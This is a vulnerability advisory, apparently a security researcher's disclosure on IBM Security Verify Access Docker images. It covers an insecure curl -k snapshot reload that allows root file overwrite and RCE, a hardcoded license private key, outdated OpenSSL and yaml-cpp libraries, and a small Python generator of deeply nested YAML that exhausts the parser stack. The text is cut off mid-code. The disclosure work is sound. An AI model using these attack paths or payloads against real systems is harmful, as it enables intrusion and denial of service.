70 download_from_cfgsvc()
71 {
72 # No need to download the snapshot if the configuration service has not
73 # been defined.
74 if [ -z "$CONFIG_SERVICE_URL" ] ; then
75 return
76 fi
77
78 if [ $1 -eq 1 ] ; then
79 Echo 960
80 fi
81
82 curl -k -s --fail -u "$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD" \
83 "$CONFIG_SERVICE_URL/snapshots/`basename $snapshot`?type=File" \
84 -o $snapshot
85
86 if [ $? -ne 0 ] ; then
87 if [ $1 -eq 1 ] ; then
88 Echo 961
89 fi
90
91 rm -f $snapshot
92 else
93 Echo 962
94 fi
95 }
[...]
97 #############################################################################
98 # Main line.
99
100 #
101 # Download the snapshot file.
102 #
103
104 download_from_cfgsvc 1
[...]
127 #
128 # Update the configuration database.
129 #
130
131 Echo 997
132
133 db_root=/var/postgresql/config
134 db_snapshot=$db_root/snapshot.sql
135 db_port=5432
136 db_name=config
137 db_user=www-data
138
139 if [ ! -f $db_snapshot ] ; then
140 Echo 975
141 exit 1
142 fi
143
144 psql -U $db_user -d $db_name -p $db_port -f $db_snapshot -q -b -w
[/code]
Details - Remote Code Execution due to insecure reload script in verify-access-wrp
It was observed that the Docker image verify-access-wrp uses a highly insecure reload script.
An attacker located on the network can inject a malicious snapshot file into the platform or MITM the connection to a server containing the snapshot image and take control over the entire platform. The attacker can also overwrite any file present in the verify-access-wrp Docker instance (getting Remote Code Execution).
This script is defined at the end of the /usr/sbin/install_system.sh script:
Content of /usr/sbin/install_system.sh in verify-access-wrp:
[code:shell]
210 #
211 # Ensure that the restart script is executable.
212 #
213
214 mv /sbin/restart.sh /sbin/wrprestart
215
216 chmod 755 /sbin/wrprestart
[/code]
Analysis of /sbin/wrprestart:
The function download_from_cfgsvc() is insecure as the curl command uses the -k option (also known as --insecure) to download and install a snapshot into the instance: any invalid SSL certificate for the remote server will be accepted because of the -k option.
The openldap.zip file found in the malicious snapshot file will then be decrypted using a previously found hardcoded key and extracted into the / directory (lines 154 and 156), and openldap will be restarted with the new configuration file, allowing an attacker to get Remote Code Execution by specifying a malicious slapd.conf file (stored inside openldap.zip, in etc/openldap/slapd.conf).
Since the extraction of openldap.zip takes place in /, it is also possible to overwrite any file as root (and get Remote Code Execution, e.g. by replacing a program).
[code:shell]
85 #############################################################################
86 # Attempt to download the snapshot from the configuration service.
87
88 download_from_cfgsvc()
89 {
90 # No need to download the snapshot if the configuration service has not
91 # been defined.
92 if [ -z "$CONFIG_SERVICE_URL" ] ; then
93 return
94 fi
95
96 if [ $1 -eq 1 ] ; then
97 Echo 960
98 fi
99
100 curl -k -s --fail -u "$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD" \
101 "$CONFIG_SERVICE_URL/snapshots/`basename $snapshot`?type=File" \
102 -o $snapshot
103
104 if [ $? -ne 0 ] ; then
105 if [ $1 -eq 1 ] ; then
106 Echo 961
107 fi
108
109 rm -f $snapshot
110 else
111 Echo 962
112 fi
113 }
[...]
137 #############################################################################
138 # Process the OpenLDAP configuration and then restart the OpenLDAP server.
139
140 restart_openldap_server()
141 {
142 # Check to see whether the embedded LDAP server has been enabled or
143 # not.
144 ldap_conf="/var/PolicyDirector/etc/ldap.conf"
145 ldap_host=`$pdconf -f $ldap_conf getentry ldap host`
146
147 if [ "$ldap_host" != "127.0.0.1" ] ; then
148 return
149 fi
150
151 Echo 964
152
153 # Decrypt and extract the LDAP configuration.
154 isva_decrypt $snapshot_tmp_dir/openldap.zip
155
156 unzip -q -o $snapshot_tmp_dir/openldap.zip -d /
157
158 # Change the LDAP port from 389 to 6389 (389 is a privileged port).
159 $pdconf -f $ldap_conf setentry ldap port 6389
160
161 # Stop the LDAP server.
162 busybox killall -SIGHUP slapd
163
164 while $(busybox killall -0 slapd 2>/dev/null); do
165 sleep 1
166 done
167
168 # Start the LDAP server.
169 slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0
170 }
[...]
260 #############################################################################
261 # Main line.
262
263 #
264 # Attempt to download the configuration data from the configuration service.
265 #
266
267 #
268 # Wait for the snapshot file.
269 #
270
271 download_from_cfgsvc 1
[...]
305 #
306 # Restart the OpenLDAP server.
307 #
308
309 restart_openldap_server
[/code]
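A sketch of the missing guard (`safe_entry` is a hypothetical helper, not part of wrprestart): extract into a dedicated directory rather than /, and reject any archive entry that is absolute or contains a `..` component, so a malicious snapshot cannot overwrite arbitrary files.

```shell
# Hypothetical guard against the "unzip -o ... -d /" pattern: reject
# entry names that would escape the extraction directory.
safe_entry()
{
    case "$1" in
        /*|../*|*/../*|*/..|..) return 1 ;;   # absolute or parent-relative
        *) return 0 ;;
    esac
}

# In wrprestart this would filter the archive listing before extracting
# into a dedicated directory such as /var/openldap-restore (illustrative
# path) instead of /.
for e in "etc/openldap/slapd.conf" "/etc/passwd" "../../sbin/init"; do
    if safe_entry "$e" ; then echo "ok: $e"; else echo "rejected: $e"; fi
done
```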
Details - Hardcoded private key for IBM ISS (ibmcom/verify-access)
It was observed that the ibmcom/verify-access Docker image contains a hardcoded private key used by the license client iss-lum:
kali-docker# pwd
/home/user/ibmcom/_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/lum
kali-docker# ls -al
total 492
drwxr-xr-x 2 root root 4096 Jun 8 01:43 .
drwxr-xr-x 25 root root 4096 Jun 8 04:09 ..
-rwxr-xr-x 1 root root 1296 Oct 20 2016 externalTrustSettings.xml
-rwxr-xr-x 1 root root 445080 Oct 20 2016 iss-external.kdb
-rwxr-xr-x 1 root root 129 Oct 20 2016 iss-external.sth
-rwxr-xr-x 1 root root 100 Oct 20 2016 iss-lum.conf
-rwxr-xr-x 1 root root 3649 Oct 20 2016 isslum-usLocalSettings.xml
-rwxr-xr-x 1 root root 725 Oct 20 2016 lum_triggers.conf
-rwxr-xr-x 1 root root 1858 Oct 20 2016 private.pem
-rwxr-xr-x 1 root root 451 Oct 20 2016 public.pem
-rwxr-xr-x 1 root root 3926 Oct 20 2016 .udrc
-rwxr-xr-x 1 root root 806 Oct 20 2016 update-settings.conf
-rwxr-xr-x 1 root root 7352 Oct 20 2016 update-status.xsd
-rwxr-xr-x 1 root root 561 Jun 8 01:32 UpdateTypeNames.config
-rwxr-xr-x 1 root root 0 Dec 31 1969 .wh..wh..opq
kali-docker# sha256sum private.pem public.pem
e1ecbd519ef838861cb0fe5e5daad88f90b9b2c154a936daf7f08855039b0c1d private.pem
3a6bbfef0af62c277cbe7b7fbc061b6a11b01e9ff61bba7bfe7edcaaeae3cd20 public.pem
When analyzing the podman instance verify-access, we can confirm the key has not been updated:
[isam@verify-access lum]$ sha256sum private.pem public.pem
e1ecbd519ef838861cb0fe5e5daad88f90b9b2c154a936daf7f08855039b0c1d private.pem
3a6bbfef0af62c277cbe7b7fbc061b6a11b01e9ff61bba7bfe7edcaaeae3cd20 public.pem
[isam@verify-access lum]$
The private key appears to be used by several programs:
- /opt/dca/bin/dcatool
- /usr/bin/isslum-modstatus
- /usr/sbin/iss-lum
- /usr/sbin/mesa_config
- /usr/sbin/mesa_eventsd
- /usr/sbin/isslum-installer
The license client is using outdated code and may contain vulnerabilities.
The keys are hardcoded and have not been updated for 6 years, which raises the question of how the license client is being maintained.
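Instead of shipping one private.pem baked into every image, a first-boot hook could generate a per-deployment key. The sketch below is hypothetical (it assumes the consuming programs accept a regenerated key, and the path is illustrative, not /etc/lum):

```shell
# Hypothetical first-boot key generation, so each deployment gets its
# own key instead of the 2016 key shared by every shipped image.
key=/tmp/lum-private.pem     # illustrative path
if [ ! -f "$key" ] ; then
    openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 \
        -out "$key" 2>/dev/null
    chmod 600 "$key"
fi
# Sanity-check that the generated key parses.
openssl pkey -in "$key" -noout && echo "key ok"
```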
Details - dcatool using an outdated OpenSSL library (ibmcom/verify-access)
It was observed that the dcatool program located in /opt/dca/bin is linked with an outdated OpenSSL library located in the non-standard directory /opt/dca/lib:
From a live system:
[isam@verify-access bin]$ pwd
/opt/dca/bin
[isam@verify-access bin]$ ls -la
total 580
drwxr-xr-x 2 root root 4096 Jun 8 13:43 .
drwxr-xr-x 4 root root 4096 Jun 8 13:43 ..
-rwxr-xr-x 1 root root 373208 Jun 8 13:31 dcatool
-rwxr-xr-x 1 root root 207872 Jun 8 13:31 dcaupdate
[isam@verify-access bin]$ ldd dcatool | grep ssl
libssl.so.10 => /opt/dca/lib/libssl.so.10 (0x00007fafcfb1e000)
libssl.so.1.1 => /lib64/libssl.so.1.1 (0x00007fafcda45000)
[isam@verify-access bin]$ ldd dcaupdate | grep ssl
libssl.so.10 => /opt/dca/lib/libssl.so.10 (0x00007fe04980d000)
libssl.so.1.1 => /lib64/libssl.so.1.1 (0x00007fe047734000)
Analysis of the library:
[isam@verify-access lib]$ pwd
/opt/dca/lib
[isam@verify-access lib]$ ls -la
total 4156
drwxr-xr-x 2 root root 4096 Jun 8 13:43 .
drwxr-xr-x 4 root root 4096 Jun 8 13:43 ..
-rwxr-xr-x 1 root root 1252080 Jun 8 13:31 libboost_regex.so.1.53.0
-rwxr-xr-x 1 root root 2521496 Jun 8 13:31 libcrypto.so.10
lrwxrwxrwx 1 root root 24 Jun 8 13:43 libicudata.so.54 -> /usr/lib64/libicudata.so
lrwxrwxrwx 1 root root 24 Jun 8 13:43 libicui18n.so.54 -> /usr/lib64/libicui18n.so
lrwxrwxrwx 1 root root 22 Jun 8 13:43 libicuuc.so.54 -> /usr/lib64/libicuuc.so
-rwxr-xr-x 1 root root 470328 Jun 8 13:31 libssl.so.10
[isam@verify-access lib]$ sha256sum *so*
a4b9594f78c0e5cfa14c171e07ae439dccd0ef990db8c4b155c68fde43a8d9a9 libboost_regex.so.1.53.0
8db48d5bcf1ddf6a8a4033de04827288b33af36d246c73ba46041365a61c697c libcrypto.so.10
07796e84fc3618a64259cfff7a896e57fc90f6b270d690d953f4792c2b7e21ac libicudata.so.54
49e6f6b12d118118c7d17cec26f80c81b39c89ea01a30eaf26abb07859d909fe libicui18n.so.54
1504c73f432bc24414c0ca69d29bdb04c04ba2269b752c320306cb25aadd5972 libicuuc.so.54
523ad80dd3cd9afe19bbb83eb22b11ba43b0dc907a3893a38569023ef7b382f0 libssl.so.10
[isam@verify-access lib]$
We can retrieve these 2 libraries inside the ibmcom/verify-access image and identify the version of OpenSSL:
kali-docker# sha256sum **/libssl.so.10
523ad80dd3cd9afe19bbb83eb22b11ba43b0dc907a3893a38569023ef7b382f0 698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libssl.so.10
kali-docker# sha256sum **/libcrypto.so.10
8db48d5bcf1ddf6a8a4033de04827288b33af36d246c73ba46041365a61c697c 698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libcrypto.so.10
kali-docker# strings 698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libcrypto.so.10|grep -i openssl
[...]
OpenSSL 1.0.2k-fips 26 Jan 2017
[...]
kali-docker# strings 698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libssl.so.10|grep -i openssl
OpenSSL 1.0.2k-fips 26 Jan 2017
[...]
The libraries located in /opt/dca/lib are completely outdated and are vulnerable to known CVEs.
These libraries are likely used by IBM-specific programs.
The Docker images contain known vulnerabilities.
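The manual strings check above can be generalized to a whole directory. The helper below is a hypothetical sketch (`report_openssl_versions` is not part of the product) that greps each shared object for its embedded OpenSSL version banner:

```shell
# Hypothetical audit helper: print the embedded OpenSSL version banner
# of every shared object under a directory (same technique as the
# manual "strings | grep -i openssl" check).
report_openssl_versions()
{
    for lib in "$1"/*.so*; do
        [ -f "$lib" ] || continue
        v=$(grep -ao 'OpenSSL [0-9][^ ]* [0-9][0-9]* [A-Z][a-z]* [0-9]*' "$lib" | head -n 1)
        echo "$lib: ${v:-no OpenSSL banner}"
    done
}

# Demo against a fake library containing the banner seen in /opt/dca/lib.
mkdir -p /tmp/fakelib
printf 'xx OpenSSL 1.0.2k-fips 26 Jan 2017 yy' > /tmp/fakelib/libdemo.so.10
report_openssl_versions /tmp/fakelib
```

Run against /opt/dca/lib inside the image, this would immediately surface the 2017-era library.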
Details - iss-lum using an outdated OpenSSL library (ibmcom/verify-access) and hardcoded keys
It was observed that the /usr/sbin/iss-lum program from the verify-access Docker image contains outdated OpenSSL code (from the 0.9.7 branch, dating to 2007). The iss-lum program is the license client that will connect to external servers.
This program runs inside the instance:
[isam@verify-access /]$ ps -auxw
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
isam 1 0.0 0.0 12060 132 ? Ss Oct04 0:00 /bin/sh /sbin/bootstrap.sh
isam 313 0.0 0.0 24532 68 ? Ss Oct04 0:00 /usr/sbin/mesa_crashd
isam 315 0.1 0.0 24532 1032 ? S Oct04 1:57 /usr/sbin/mesa_crashd
isam 319 0.0 0.0 69160 144 ? Ss Oct04 0:00 /usr/sbin/mesa_syslogd
isam 321 0.0 0.0 69224 1280 ? S Oct04 0:00 /usr/sbin/mesa_syslogd
isam 400 0.0 0.0 102760 200 ? Ss Oct04 0:00 /usr/sbin/mesa_eventsd -m 1000
isam 401 0.0 0.0 710856 316 ? Sl Oct04 0:00 /usr/sbin/mesa_eventsd -m 1000
pgresql 435 0.0 0.0 188380 7016 ? Ss Oct04 0:02 /usr/bin/postgres -D /var/postgresql/config/data
pgresql 436 0.0 0.0 138892 184 ? Ss Oct04 0:00 postgres: logger
pgresql 447 0.0 0.0 188380 1600 ? Ss Oct04 0:00 postgres: checkpointer
pgresql 448 0.0 0.0 188516 1288 ? Ss Oct04 0:01 postgres: background writer
pgresql 449 0.0 0.0 188380 1468 ? Ss Oct04 0:01 postgres: walwriter
pgresql 450 0.0 0.0 189112 1864 ? Ss Oct04 0:01 postgres: autovacuum launcher
pgresql 451 0.0 0.0 139024 588 ? Ss Oct04 0:05 postgres: stats collector
pgresql 452 0.0 0.0 188916 1016 ? Ss Oct04 0:00 postgres: logical replication launcher
www-data 548 0.4 4.8 4920352 387128 ? SLl Oct04 7:53 /opt/java/jre/bin/java -javaagent:/opt/IBM/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.sun.jndi.ldap.object.disableEndpointIdentification=true -Djava.security.properties=/opt/IBM/wlp/usr/servers/default/java.security -Dcom.ibm.ws.logging.log.directory=/var/application.logs.local/lmi -Xbootclasspath/a:/opt/pdjrte/java/export/rgy/com.tivoli.pd.rgy.jar:/opt/ibm/wlp/usr/servers/runtime/lib/global/xercesImpl.jar -Dorg.osgi.framework.system.packages.extra=com.tivoli.pd.rgy,com.tivoli.pd.rgy.authz,com.tivoli.pd.rgy.exception,com.tivoli.pd.rgy.ldap,com.tivoli.pd.rgy.nls,com.tivoli.pd.rgy.util,com.ibm.misc,com.ibm.net.ssl.www2.protocol.https,com.sun.jndi.ldap,org.apache.xml.serialize -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 --add-exports java.base/sun.security.action=ALL-UNNAMED --add-exports java.naming/com.sun.jndi.ldap=ALL-UNNAMED --add-exports java.naming/com.sun.jndi.url.ldap=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.lang=ALL-UNNAMED --add-opens java.base/java.util.concurrent=ALL-UNNAMED --add-opens java.base/java.io=ALL-UNNAMED --add-opens java.naming/javax.naming.spi=ALL-UNNAMED --add-opens jdk.naming.rmi/com.sun.jndi.url.rmi=ALL-UNNAMED --add-opens java.naming/javax.naming=ALL-UNNAMED --add-opens java.rmi/java.rmi=ALL-UNNAMED --add-opens java.sql/java.sql=ALL-UNNAMED --add-opens java.management/javax.management=ALL-UNNAMED --add-opens java.base/java.lang.reflect=ALL-UNNAMED --add-opens java.desktop/java.awt.image=ALL-UNNAMED --add-opens java.base/java.security=ALL-UNNAMED --add-opens java.base/java.net=ALL-UNNAMED -jar /opt/IBM/wlp/bin/tools/ws-server.jar default --clean
isam 748 0.0 0.0 270992 8 ? Ssl Oct04 0:02 /usr/sbin/wga_watchdogd slapdw -log_file /var/application.logs.local/verify_access_runtime/user_registry/msg__user_registry.log /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap
ldap 753 0.0 4.3 1314228 346548 ? Sl Oct04 0:00 /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap
isam 757 0.0 0.0 271124 8 ? Ssl Oct04 0:02 /usr/sbin/wga_watchdogd ISAM-Policy-Server -log_file /var/application.logs.local/verify_access_runtime/policy/msg__pdmgrd.log -cfg /var/PolicyDirector/etc/ivmgrd.conf /opt/PolicyDirector/bin/pdmgrd -foreground
ivmgr 762 0.0 0.1 1070184 10860 ? Sl Oct04 0:01 /opt/PolicyDirector/bin/pdmgrd -foreground
isam 805 0.0 0.0 71488 316 ? Ss Oct04 0:00 /usr/sbin/iss-lum
isam 806 0.0 0.0 343920 5264 ? Sl Oct04 0:00 /usr/sbin/iss-lum
root 811 0.0 0.0 41984 2416 ? Ss Oct04 0:00 /usr/sbin/crond
isam 834 0.0 0.0 128400 2076 ? Ssl Oct04 0:00 /usr/sbin/rsyslogd
root 859 0.0 0.0 174348 96 ? Ss Oct04 0:00 /usr/sbin/wga_servertaskd
ivmgr 861 0.0 0.0 276544 84 ? Sl Oct04 0:00 /usr/sbin/wga_servertaskd
isam 870 0.0 0.0 273920 8 ? Ssl Oct04 0:02 /usr/sbin/wga_watchdogd wga_notifications -log_file /var/log/wga_notifications.log wga_notifications -foreground
isam 877 2.1 0.2 563872 18472 ? Sl Oct04 38:43 wga_notifications -foreground
isam 889 0.0 0.0 12060 80 ? S Oct04 0:00 /bin/sh /sbin/bootstrap.sh
isam 892 0.0 0.0 23068 24 ? S Oct04 0:00 /usr/bin/coreutils --coreutils-prog-shebang=tail /usr/bin/tail -F -n+0 /var/application.logs.local/lmi/messages.log
isam 217541 4.0 0.0 19248 3836 pts/0 Ss 21:37 0:00 bash
isam 217564 0.0 0.0 54808 4080 pts/0 R+ 21:37 0:00 ps -auxww
[isam@verify-access /]$
This program appears to establish connections to remote servers to check the license.
The OpenSSL library embedded inside the program is completely outdated (0.9.7j - Feb 2007):
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
Furthermore, this program includes several hardcoded keys to decrypt the private key in /etc/lum/private.pem. In the function ctor_009:
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
Some decryption keys have been identified within the binaries used to check the license:
Function sub_4806C0:
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
Function ctor_009:
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
The Docker images contain known vulnerabilities.
Details - Outdated "IBM Crypto for C" library
It was observed that the IBM Crypto for C library is installed inside all the Docker images in the directory /usr/local/ibm/gsk8_64:
For example, from the Docker image verify-access-wrp:
kali-docker# cd ./_verify-access-wrp.tar/b96855ec6855fe34f69782b210ae257d2203ad22d4d79f3bfd4818fa57bcc39a
kali-docker# find usr/local/ibm
usr/local/ibm
usr/local/ibm/gsk8_64
usr/local/ibm/gsk8_64/lib64
usr/local/ibm/gsk8_64/lib64/libgsk8cms_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8kicc_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8p11_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8ssl_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8drld_64.so
usr/local/ibm/gsk8_64/lib64/C
usr/local/ibm/gsk8_64/lib64/C/icc
usr/local/ibm/gsk8_64/lib64/C/icc/icclib
usr/local/ibm/gsk8_64/lib64/C/icc/icclib/libicclib084.so
usr/local/ibm/gsk8_64/lib64/C/icc/icclib/ICCSIG.txt
usr/local/ibm/gsk8_64/lib64/libgsk8ldap_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8iccs_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8valn_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8acmeidup_64.so
usr/local/ibm/gsk8_64/lib64/N
usr/local/ibm/gsk8_64/lib64/N/icc
usr/local/ibm/gsk8_64/lib64/N/icc/icclib
usr/local/ibm/gsk8_64/lib64/N/icc/icclib/libicclib085.so
usr/local/ibm/gsk8_64/lib64/N/icc/icclib/ICCSIG.txt
usr/local/ibm/gsk8_64/lib64/N/icc/ReadMe.txt
usr/local/ibm/gsk8_64/lib64/libgsk8dbfl_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8km2_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8km_64.so
usr/local/ibm/gsk8_64/lib64/libgsk8sys_64.so
usr/local/ibm/gsk8_64/docs
usr/local/ibm/gsk8_64/copyright
usr/local/ibm/gsk8_64/inc
usr/local/ibm/gsk8_64/bin
usr/local/ibm/gsk8_64/bin/gsk8capicmd_64
usr/local/ibm/gsk8_64/bin/gsk8ver_64
usr/local/ibm/.wh..wh..opq
kali-docker#
This library is based on the opensource libraries zlib and OpenSSL. It was built in October 2020, as shown below:
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
Furthermore, the copyrights from the /usr/local/ibm/gsk8_64/lib64/N/icc/ReadMe.txt file indicate:
- (C) 1995-2004 Jean-loup Gailly and Mark Adler - for zlib
- Copyright (c) 1998-2007 The OpenSSL Project. All rights reserved. - for OpenSSL
The /usr/local/ibm/gsk8_64/lib64/N/icc/icclib/ICCSIG.txt file confirms the libraries were generated 2 years ago:
#
# IBM Crypto for C.
# ICC Version 8.7.37.0
#
# Note the signed library contains a copy of cryptographic code from OpenSSL (www.openssl.org),
# zlib (www.zlib.org)
# and IBM code (www.ibm.com)
#
# Platform AMD64_LINUX
#
# Generated Tue Oct 13 12:09:08 2020
#
# File name=libicclib085.so
# File Hash (SHA256)=bbbb89eae43b11aba9a132a53207ca532236cd064b6aa0b84ea878a0b9bf8b4f
#
FILE=906082662e6b3a50fc01a95f2d1bb29d3a54349ad76da59fc8555fadadae4e5305463810ece2064174129a95e89352a02d8c72c7397de2d01b38220c3222796992785b8d99401a65b0894778a2b05760ae1a6919a97e259d270ff5e6996a14fc29e48a848c59e14f2aa758e8e26355faeff60eca0562ad643a86b8fdaa6afd10190190d411a584679ff1ee93caf5039ef070d411040fc828e4b8f79b8bb67d3ec1708c8274c0c9f6899399492fa52c73574065f2684dcc336c41eee2b808b42b0a01578b32fae245b761580240e3b53359767634ba76018f46a8d732c21ec24bf1a979aa11af20b646f166d5658efabcebdf6283fbdc793d82636e89bf2ac4ad
#
SELF=10fefb48a0666936f23aceae7805a7dcefb06a9a2282fea0693610a98ccf12cab8bfef973cda13450afde785960eccb2637adaf15f5e795cdb21f667704ba30ebf6a6a077f29a3574d0792ef633172d324a5b26adc257d3380ffd1cf7698bc560fb52d5c083ffa85fe623e059f7c8d67a8043ca75d8808c082de29bb8e1c46a01421039e557699cf7747c07a22a0e1612b0e4de8836833bebc888269dc46adf0ed5ba0107da2e683554433ed29ab840d16af34581682e35a30d11ff10fbd8ba0cc7ae6a62b75c3ba4758863e5a5a4cf00371040358a732a56ecf7dd04523c85544755c6f0f42447f383ec22e0ee4d79bb3c6e6defc4319f555afaaa1cfc8642f
#
#Do not edit before this line
#
# Global Settings
ICC_ALLOW_2KEY3DES=1
The OpenSSL code and the zlib code are at least 2 years old and vulnerable to CVEs.
The Docker images contain known vulnerabilities.
Details - Webseald using outdated code with remotely exploitable vulnerabilities
It was observed that the webseald program borrows code from open-source libraries containing outdated and vulnerable code. This program can be found inside these 2 images:
- verify-access
- verify-access-wrp
Webseald is reachable over the network.
Libraries used by webseald:
kali-docker# ldd ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/opt/pdweb/bin/webseald
linux-vdso.so.1 (0x00007fffe59f3000)
libwsdaemon.so => not found
libamwoauth.so => not found
libamweb.so => not found
libamwebrte.so => not found
libpdsvcutl.so => not found
libtivsec_msg.so => not found
libpdz.so => not found
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f61885e8000)
libtivsec_xslt4c.so.112 => not found
libtivsec_xml4c.so => not found
libtivsec_yamlcpp.so => not found
libam_gssapi_krb5.so => not found
libmodsecurity.so.3 => not found
libamwredismgr.so => not found
libhiredis.so.0.15 => not found
libhiredis_ssl.so.0.15 => not found
libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f61885df000)
libstdc++.so.6 => /lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007f6188200000)
libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007f6188504000)
libgcc_s.so.1 => /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007f61884e4000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f6187e00000)
/lib64/ld-linux-x86-64.so.2 (0x00007f6188604000)
The IBM-specific libraries (.so) have been analyzed only superficially to detect low-hanging fruit, and several vulnerabilities were found, including some pre-auth vulnerabilities.
Webseal is directly reachable from the network but uses outdated and vulnerable code.
The quality of the code is extremely uneven across the libraries - some code is very well implemented (with secure calls to *cpy functions) and some code is vulnerable (with insecure calls to *cpy functions). These libraries contain legacy code that is not up to date with current security standards.
Due to the lack of time, only a superficial analysis was done - an attacker with time will likely find 0-day vulnerabilities in these libraries.
Libmodsecurity.so - 1 vulnerability with no assigned CVE
The /opt/pdweb/lib/libmodsecurity.so.3 library (b939c5db3ca94073188ea6eb360049f58f9e9d2a9c7d72bc052d9ee47cc5eccc) contains a vulnerable libinjection library. The version used is 3.9.2:
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
This version (3.9.2) is known to have several vulnerabilities. For example, a pre-authentication DoS (https://github.com/SpiderLabs/ModSecurity/issues/1412) from 2017 (no CVE).
This version is confirmed to be vulnerable: https://github.com/client9/libinjection/issues/124.
libtivsec_yamlcpp.so - 4 CVEs
This IBM library is entirely based on yaml-cpp. Yaml-cpp is available at https://github.com/jbeder/yaml-cpp.
Several vulnerabilities were patched in 2020 (CVE-2017-5950, CVE-2018-20573, CVE-2018-20574 and CVE-2019-6285) in the yaml-cpp library.
This IBM-specific library is located at /usr/lib64/libtivsec_yamlcpp.so and /opt/ibm/Tivoli/SecUtilities/lib/libtivsec_yamlcpp.so (cf1b80c501a2f42948322567477c2956155e244d645e3962985569c4496ffad90).
Reverse engineering this file shows that no security patches have been imported from the official yaml-cpp repository.
We can identify several methods from the yaml-cpp library. For example, the method SingleDocParser::HandleFlowMap() found in /usr/lib64/libtivsec_yamlcpp.so and /opt/ibm/Tivoli/SecUtilities/lib/libtivsec_yamlcpp.so:
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
When analyzing the security patches available at https://github.com/jbeder/yaml-cpp/pull/807 and https://github.com/jbeder/yaml-cpp/pull/807/files/dbd5ac094622ef3b3951e71c31f59e02c930dc4b, there is no reference in the compiled code to a DeepRecursion class or to any method implemented in the security patches. This DeepRecursion class is included in the now-patched versions.
The IBM-specific library is using an outdated and vulnerable version of yaml-cpp, without security patches, e.g. 4 CVEs patched in yaml-cpp - https://github.com/jbeder/yaml-cpp/pull/807.
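These CVEs are stack-exhaustion bugs triggered by deeply nested documents. A minimal Python sketch of the kind of payload involved (the depth value and the helper name are illustrative only, not a tested threshold for this library):

```python
def nested_yaml_payload(depth: int) -> str:
    """Build a YAML flow sequence nested `depth` levels deep.

    Parsers that recurse once per nesting level without a depth guard
    (as yaml-cpp did before jbeder/yaml-cpp PR #807) can exhaust the
    stack on such input.
    """
    return "[" * depth + "]" * depth

print(nested_yaml_payload(6))  # → [[[[[[]]]]]]
```

A real attack uses a depth in the tens of thousands; the principle is identical.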
Analysis of the security patches implementing new classes:
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
Furthermore, it is possible to analyze the rest of the security patches from the git repository and compare them with the assembly code from the libtivsec_yamlcpp.so library. This allows us to conclude that the security patches have not been imported into the libtivsec_yamlcpp.so library.
Source code providing security patches:
Method HandleNode() from the security patches and the patched versions of yaml-cpp:
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
With the assembly code extracted from the libtivsec_yamlcpp.so library and rebuilt into pseudo-code, we can identify the same logic and the same instructions (minus some errors due to the reconstruction from assembly to C++) - but without the patch located at line 51.
Pseudo-code of method HandleNode():
[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]
This allows us to conclude that the libtivsec_yamlcpp.so library is vulnerable to these 4 CVEs.
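For comparison, the upstream fix works by tracking recursion depth explicitly and aborting the parse past a limit. A simplified Python sketch of that guard on a toy parser (the names, limit and grammar are illustrative, not yaml-cpp's actual API):

```python
class DeepRecursionError(Exception):
    """Raised when a document nests deeper than the allowed limit."""

MAX_DEPTH = 100  # illustrative limit; the real patch chooses its own bound

def parse_flow_sequence(text, pos=0, depth=0):
    """Toy parser for nested '[...]' flow sequences with a depth guard.

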